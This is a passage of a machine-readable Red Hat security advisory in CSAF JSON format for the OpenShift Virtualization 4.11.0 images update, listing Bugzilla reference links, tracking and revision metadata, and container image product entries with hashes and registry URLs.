"https://bugzilla.redhat.com/show_bug.cgi?id=2087582" }, { "category": "external", "summary": "2087583", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2087583" }, { "category": "external", "summary": "2087584", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2087584" }, { "category": "external", "summary": "2087587", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2087587" }, { "category": "external", "summary": "2087589", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2087589" }, { "category": "external", "summary": "2087590", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2087590" }, { "category": "external", "summary": "2087593", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2087593" }, { "category": "external", "summary": "2087603", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2087603" }, { "category": "external", "summary": "2087616", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2087616" }, { "category": "external", "summary": "2087701", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2087701" }, { "category": "external", "summary": "2087717", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2087717" }, { "category": "external", "summary": "2088034", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2088034" }, { "category": "external", "summary": "2088355", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2088355" }, { "category": "external", "summary": "2088361", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2088361" }, { "category": "external", "summary": "2088379", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2088379" }, { "category": "external", "summary": "2088407", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2088407" }, { "category": "external", "summary": "2088471", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2088471" }, { "category": "external", "summary": "2088472", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2088472" }, { "category": "external", "summary": "2088477", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2088477" }, { "category": "external", "summary": "2088849", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2088849" }, { "category": "external", "summary": "2089078", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2089078" }, { "category": "external", "summary": "2089271", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2089271" }, { "category": "external", "summary": "2089327", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2089327" }, { "category": "external", "summary": "2089376", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2089376" }, { "category": "external", "summary": "2089477", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2089477" }, { "category": "external", "summary": "2089700", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2089700" }, { "category": "external", "summary": "2089745", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2089745" }, { "category": "external", "summary": "2089789", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2089789" }, { "category": "external", "summary": "2089825", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2089825" }, { "category": "external", "summary": "2089836", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2089836" }, { "category": "external", "summary": "2089840", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2089840" }, { "category": "external", "summary": "2089877", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2089877" }, { "category": "external", "summary": "2089932", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2089932" }, { "category": "external", "summary": "2089942", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2089942" }, { "category": "external", "summary": "2089954", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2089954" }, { "category": "external", "summary": "2089963", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2089963" }, { "category": "external", "summary": "2089967", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2089967" }, { "category": "external", "summary": "2089970", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2089970" }, { "category": "external", "summary": "2089972", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2089972" }, { "category": "external", "summary": "2089979", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2089979" }, { "category": "external", "summary": "2089982", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2089982" }, { "category": "external", "summary": "2090035", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2090035" }, { "category": "external", "summary": "2090036", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2090036" }, { "category": "external", "summary": "2090037", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2090037" }, { "category": "external", "summary": "2090038", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2090038" }, { "category": "external", "summary": "2090042", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2090042" }, { "category": "external", "summary": "2090043", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2090043" }, { "category": "external", "summary": "2090046", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2090046" }, { "category": "external", "summary": "2090048", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2090048" }, { "category": "external", "summary": "2090054", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2090054" }, { "category": "external", "summary": "2090055", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2090055" }, { "category": "external", "summary": "2090056", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2090056" }, { "category": "external", "summary": "2090057", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2090057" }, { "category": "external", "summary": "2090059", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2090059" }, { "category": "external", "summary": "2090064", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2090064" }, { "category": "external", "summary": "2090066", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2090066" }, { "category": "external", "summary": "2090068", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2090068" }, { "category": "external", "summary": "2090131", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2090131" }, { "category": "external", "summary": "2090350", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2090350" }, { "category": "external", "summary": "2091003", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2091003" }, { "category": "external", "summary": "2091058", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2091058" }, { "category": "external", "summary": "2091309", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2091309" }, { "category": "external", "summary": "2091406", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2091406" }, { "category": "external", "summary": "2091754", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2091754" }, { "category": "external", "summary": "2091755", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2091755" }, { "category": "external", "summary": "2091756", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2091756" }, { "category": "external", "summary": "2091758", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2091758" }, { "category": "external", "summary": "2091760", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2091760" }, { "category": "external", "summary": "2091761", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2091761" }, { "category": "external", "summary": "2091762", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2091762" }, { "category": "external", "summary": "2091764", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2091764" }, { "category": "external", "summary": "2091765", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2091765" }, { "category": "external", "summary": "2091766", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2091766" }, { "category": "external", "summary": "2091853", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2091853" }, { "category": "external", "summary": "2091863", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2091863" }, { "category": "external", "summary": "2091868", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2091868" }, { "category": "external", "summary": "2091889", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2091889" }, { "category": "external", "summary": "2091897", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2091897" }, { "category": "external", "summary": "2091904", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2091904" }, { "category": "external", "summary": "2091911", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2091911" }, { "category": "external", "summary": "2091940", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2091940" }, { "category": "external", "summary": "2091945", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2091945" }, { "category": "external", "summary": "2091946", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2091946" }, { "category": "external", "summary": "2091982", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2091982" }, { "category": "external", "summary": "2092048", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2092048" }, { "category": "external", "summary": "2092052", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2092052" }, { "category": "external", "summary": "2092071", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2092071" }, { "category": "external", "summary": "2092079", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2092079" }, { "category": "external", "summary": "2092158", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2092158" }, { "category": "external", "summary": "2092228", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2092228" }, { "category": "external", "summary": "2092230", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2092230" }, { "category": "external", "summary": "2092306", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2092306" }, { "category": "external", "summary": "2092337", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2092337" }, { "category": "external", "summary": "2092359", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2092359" }, { "category": "external", "summary": "2092654", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2092654" }, { "category": "external", "summary": "2092662", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2092662" }, { "category": "external", "summary": "2092663", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2092663" }, { "category": "external", "summary": "2092664", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2092664" }, { "category": "external", "summary": "2092781", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2092781" }, { "category": "external", "summary": "2092783", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2092783" }, { "category": "external", "summary": "2092787", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2092787" }, { "category": "external", "summary": "2092789", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2092789" }, { "category": "external", "summary": "2092951", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2092951" }, { "category": "external", "summary": "2093282", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2093282" }, { "category": "external", "summary": "2093691", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2093691" }, { "category": "external", "summary": "2093713", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2093713" }, { "category": "external", "summary": "2093715", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2093715" }, { "category": "external", "summary": "2093716", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2093716" }, { "category": "external", "summary": "2093772", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2093772" }, { "category": "external", "summary": "2093773", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2093773" }, { "category": "external", "summary": "2093866", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2093866" }, { "category": "external", "summary": "2093867", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2093867" }, { "category": "external", "summary": "2094202", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2094202" }, { "category": "external", "summary": "2094207", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2094207" }, { "category": "external", "summary": "2094208", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2094208" }, { "category": "external", "summary": "2094217", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2094217" }, { "category": "external", "summary": "2094222", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2094222" }, { "category": "external", "summary": "2094323", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2094323" }, { "category": "external", "summary": "2094405", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2094405" }, { "category": "external", "summary": "2094440", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2094440" }, { "category": "external", "summary": "2094451", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2094451" }, { "category": "external", "summary": "2094453", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2094453" }, { "category": "external", "summary": "2094465", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2094465" }, { "category": "external", "summary": "2094471", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2094471" }, { "category": "external", "summary": "2094481", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2094481" }, { "category": "external", "summary": "2094486", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2094486" }, { "category": "external", "summary": "2094491", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2094491" }, { "category": "external", "summary": "2094495", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2094495" }, { "category": "external", "summary": "2094646", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2094646" }, { "category": "external", "summary": "2094665", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2094665" }, { "category": "external", "summary": "2094678", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2094678" }, { "category": "external", "summary": "2094727", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2094727" }, { "category": "external", "summary": "2094807", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2094807" }, { "category": "external", "summary": "2094813", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2094813" }, { "category": "external", "summary": "2094848", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2094848" }, { "category": "external", "summary": "2095125", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2095125" }, { "category": "external", "summary": "2095129", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2095129" }, { "category": "external", "summary": "2095224", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2095224" }, { "category": "external", "summary": "2095529", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2095529" }, { "category": "external", "summary": "2095530", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2095530" }, { "category": "external", "summary": "2095532", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2095532" }, { "category": "external", "summary": "2095537", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2095537" }, { "category": "external", "summary": "2095570", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2095570" }, { "category": "external", "summary": "2095573", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2095573" }, { "category": "external", "summary": "2095953", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2095953" }, { "category": "external", "summary": "2095955", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2095955" }, { "category": "external", "summary": "2096166", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2096166" }, { "category": "external", "summary": "2096206", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2096206" }, { "category": "external", "summary": "2096208", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2096208" }, { "category": "external", "summary": "2096263", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2096263" }, { "category": "external", "summary": "2096333", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2096333" }, { "category": "external", "summary": "2096492", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2096492" }, { "category": "external", "summary": "2096502", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2096502" }, { "category": "external", "summary": "2096510", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2096510" }, { "category": "external", "summary": "2096511", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2096511" }, { "category": "external", "summary": "2096620", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2096620" }, { "category": "external", "summary": "2096781", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2096781" }, { "category": "external", "summary": "2096801", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2096801" }, { "category": "external", "summary": "2096845", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2096845" }, { "category": "external", "summary": "2097328", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2097328" }, { "category": "external", "summary": "2097370", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2097370" }, { "category": "external", "summary": "2097465", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2097465" }, { "category": "external", "summary": "2097586", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2097586" }, { "category": "external", "summary": "2098134", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2098134" }, { "category": "external", "summary": "2098135", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2098135" }, { "category": "external", "summary": "2098282", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2098282" }, { "category": "external", "summary": "2099443", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2099443" }, { "category": "external", "summary": "2099533", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2099533" }, { "category": "external", "summary": "2099535", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2099535" }, { "category": "external", "summary": "2099539", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2099539" }, { "category": "external", "summary": "2099566", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2099566" }, { "category": "external", "summary": "2099608", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2099608" }, { "category": "external", "summary": "2099633", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2099633" }, { "category": "external", "summary": "2099639", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2099639" }, { "category": "external", "summary": "2099802", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2099802" }, { "category": "external", "summary": "2100054", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2100054" }, { "category": "external", "summary": "2100284", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2100284" }, { "category": "external", "summary": "2100415", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2100415" }, { "category": "external", "summary": "2100495", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2100495" }, { "category": "external", "summary": "2101164", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2101164" }, { "category": "external", "summary": "2101192", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2101192" }, { "category": "external", "summary": "2101430", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2101430" }, { "category": "external", "summary": "2101454", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2101454" }, { "category": "external", "summary": "2101485", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2101485" }, { "category": "external", "summary": "2101628", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2101628" }, { "category": "external", "summary": "2101954", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2101954" }, { "category": "external", "summary": "2102076", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2102076" }, { "category": "external", "summary": "2102116", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2102116" }, { "category": "external", "summary": "2102117", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2102117" }, { "category": "external", "summary": "2102122", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2102122" }, { "category": "external", "summary": "2102124", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2102124" }, { "category": "external", "summary": "2102125", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2102125" }, { "category": "external", "summary": "2102127", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2102127" }, { "category": "external", "summary": "2102129", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2102129" }, { "category": "external", "summary": "2102131", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2102131" }, { "category": "external", "summary": "2102135", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2102135" }, { "category": "external", "summary": "2102143", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2102143" }, { "category": "external", "summary": "2102256", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2102256" }, { "category": "external", "summary": "2102448", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2102448" }, { "category": "external", "summary": "2102543", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2102543" }, { "category": "external", "summary": "2102544", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2102544" }, { "category": "external", "summary": "2102545", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2102545" }, { "category": "external", "summary": "2104617", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2104617" }, { "category": "external", "summary": "2106175", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2106175" }, { "category": "external", "summary": "2106258", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2106258" }, { "category": "external", "summary": "2110178", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2110178" }, { "category": "external", "summary": "2111359", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2111359" }, { "category": "external", "summary": "2111562", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2111562" }, { "category": "external", "summary": "2117872", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2117872" }, { "category": "self", "summary": "Canonical URL", "url": "https://security.access.redhat.com/data/csaf/v2/advisories/2022/rhsa-2022_6526.json" } ], "title": "Red Hat Security Advisory: OpenShift Virtualization 4.11.0 Images security and bug fix update", "tracking": { "current_release_date": "2024-11-25T13:35:45+00:00", "generator": { "date": "2024-11-25T13:35:45+00:00", "engine": { "name": "Red Hat SDEngine", "version": "4.2.1" } }, "id": "RHSA-2022:6526", "initial_release_date": "2022-09-14T19:28:51+00:00", "revision_history": [ { "date": "2022-09-14T19:28:51+00:00", "number": "1", "summary": "Initial version" }, { "date": "2022-09-14T19:28:51+00:00", "number": "2", "summary": "Last updated version" }, { "date": "2024-11-25T13:35:45+00:00", "number": "3", "summary": "Last generated version" } ], "status": "final", "version": "3" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_name", "name": "CNV 4.11 for RHEL 8", "product": { "name": "CNV 4.11 for RHEL 8", "product_id": "8Base-CNV-4.11", "product_identification_helper": { "cpe": "cpe:/a:redhat:container_native_virtualization:4.11::el8" } } } ], "category": "product_family", "name": "OpenShift Virtualization" }, { "branches": [ { "category": "product_version", "name": "container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "product": { "name": "container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "product_id": "container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "product_identification_helper": { "purl": "pkg:oci/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/bridge-marker\u0026tag=v4.11.0-26" } } }, { "category": "product_version", "name": "container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "product": { "name": "container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "product_id": "container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "product_identification_helper": { "purl": "pkg:oci/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/checkup-framework\u0026tag=v4.11.0-67" } } }, { "category": "product_version", "name": "container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "product": { "name": "container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "product_id": "container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "product_identification_helper": { "purl": "pkg:oci/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/cluster-network-addons-operator\u0026tag=v4.11.0-26" } } }, { "category": "product_version", "name": "container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "product": { "name": "container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "product_id": "container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "product_identification_helper": { "purl": "pkg:oci/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/cnv-containernetworking-plugins\u0026tag=v4.11.0-26" } } }, { "category": "product_version", "name": "container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "product": { "name": "container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "product_id": "container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "product_identification_helper": { "purl": "pkg:oci/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/cnv-must-gather-rhel8\u0026tag=v4.11.0-63" } } }, { "category": "product_version", "name": "container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "product": { "name": "container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "product_id": "container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "product_identification_helper": { "purl": "pkg:oci/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/hco-bundle-registry\u0026tag=v4.11.0-601" } } }, { "category": "product_version", "name": "container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "product": { "name": "container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "product_id": "container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "product_identification_helper": { "purl": "pkg:oci/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/hostpath-csi-driver-rhel8\u0026tag=v4.11.0-21" } } }, { "category": "product_version", "name": "container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "product": { "name": "container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "product_id": "container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "product_identification_helper": { "purl": "pkg:oci/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/hostpath-csi-driver\u0026tag=v4.11.0-21" } } }, { "category": "product_version", "name": "container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "product": { "name": "container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "product_id": "container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "product_identification_helper": { "purl": "pkg:oci/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/hostpath-provisioner-rhel8\u0026tag=v4.11.0-21" } } }, { "category": "product_version", "name": "container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "product": { "name": "container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "product_id": "container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "product_identification_helper": { "purl": 